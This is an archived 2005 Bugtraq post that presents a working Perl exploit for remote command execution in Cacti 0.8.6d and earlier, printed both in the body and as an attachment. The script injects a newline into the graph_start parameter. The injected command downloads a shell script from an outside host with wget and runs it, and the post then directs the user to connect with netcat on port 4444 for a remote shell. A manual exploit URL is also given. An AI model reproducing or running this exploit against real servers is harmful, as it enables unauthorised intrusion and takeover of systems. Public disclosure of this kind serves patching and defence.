[39259] in bugtraq
Remote Command Execution Exploit for Cacti <= 0.8.6d
daemon@ATHENA.MIT.EDU (Alberto Trivero)
Thu Jun 23 11:45:42 2005
Message-ID: <007301c57753$5ab17f60$0100a8c0@alberto>
From: "Alberto Trivero" <trivero@jumpy.it>
Cc: <vuln@frsirt.com>, <submit@milw0rm.com>,
<submissions@packetstormsecurity.org>, <news@securiteam.com>,
<bugtraq@securityfocus.com>
Date: Wed, 22 Jun 2005 19:53:53 +0200
MIME-Version: 1.0
Content-Type: multipart/mixed;
boundary="----=_NextPart_000_0070_01C57764.1DCC9970"
This is a multi-part message in MIME format.
------=_NextPart_000_0070_01C57764.1DCC9970
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
#!/usr/bin/perl
#
# Remote Command Execution Exploit for Cacti <= 0.8.6d
#
# This exploit open a remote shell on the targets that uses Cacti
# TARGET HOST MUST BE A GNU/LINUX SERVER, if not:
# manual exploiting -->
http://www.example.com/cacti/graph_image.php?local_graph_id=[valid_value]&gr
aph_start=%0a[command]%0a
# Patch: download the last version http://www.cacti.net/download_cacti.php
# Discovered and Coded by Alberto Trivero
use LWP::Simple;
print "\n\t===============================\n";
print "\t= Exploit for Cacti <= 0.8.6d =\n";
print "\t= by Alberto Trivero =\n";
print "\t===============================\n\n";
if(@ARGV<2 or !($ARGV[1]=~m/\//)) {
print "Usage:\nperl $0 [target] [path]\n\nExamples:\nperl $0
www.example.com /cacti/\n";
exit(0);
}
$page=get("http://".$ARGV[0].$ARGV[1]."graph_view.php?action=list") || die
"[-] Unable to retrieve: $!";
print "[+] Connected to: $ARGV[0]\n";
$page=~m/local_graph_id=(.*?)&/ || die "[-] Unable to retrieve a value for
local_graph_id";
print "[~] Sending exploiting request, wait for some seconds/minutes...\n";
get("http://".$ARGV[0].$ARGV[1]."graph_image.php?local_graph_id=$1&graph_sta
rt=%0acd /tmp;wget http://albythebest.altervista.org/shell.pl;chmod 777
shell.pl;perl shell.pl%0a");
print "[+] Exploiting request done!\n";
print "[*] Now try on your box: nc -v $ARGV[0] 4444\n";
------=_NextPart_000_0070_01C57764.1DCC9970
Content-Type: application/octet-stream;
name="cacti.pl"
Content-Transfer-Encoding: quoted-printable
Content-Disposition: attachment;
filename="cacti.pl"
#!/usr/bin/perl
#
# Remote Command Execution Exploit for Cacti <=3D 0.8.6d
#
# This exploit open a remote shell on the targets that uses Cacti
# TARGET HOST MUST BE A GNU/LINUX SERVER, if not:
# manual exploiting --> =
http://www.example.com/cacti/graph_image.php?local_graph_id=3D[valid_valu=
e]&graph_start=3D%0a[command]%0a
# Patch: download the last version =
http://www.cacti.net/download_cacti.php
# Discovered and Coded by Alberto Trivero
use LWP::Simple;
print =
"\n\t=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D\n";
print "\t=3D Exploit for Cacti <=3D 0.8.6d =3D\n";
print "\t=3D by Alberto Trivero =3D\n";
print =
"\t=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D\n\n";
if(@ARGV<2 or !($ARGV[1]=3D~m/\//)) {
print "Usage:\nperl $0 [target] [path]\n\nExamples:\nperl $0 =
www.example.com /cacti/\n";
exit(0);
}
$page=3Dget("http://".$ARGV[0].$ARGV[1]."graph_view.php?action=3Dlist") =
|| die "[-] Unable to retrieve: $!";
print "[+] Connected to: $ARGV[0]\n";
$page=3D~m/local_graph_id=3D(.*?)&/ || die "[-] Unable to retrieve a =
value for local_graph_id";
print "[~] Sending exploiting request, wait for some =
seconds/minutes...\n";
get("http://".$ARGV[0].$ARGV[1]."graph_image.php?local_graph_id=3D$1&grap=
h_start=3D%0acd /tmp;wget =
http://albythebest.altervista.org/shell.pl;chmod 777 shell.pl;perl =
shell.pl%0a");
print "[+] Exploiting request done!\n";
print "[*] Now try on your box: nc -v $ARGV[0] 4444\n";
------=_NextPart_000_0070_01C57764.1DCC9970--
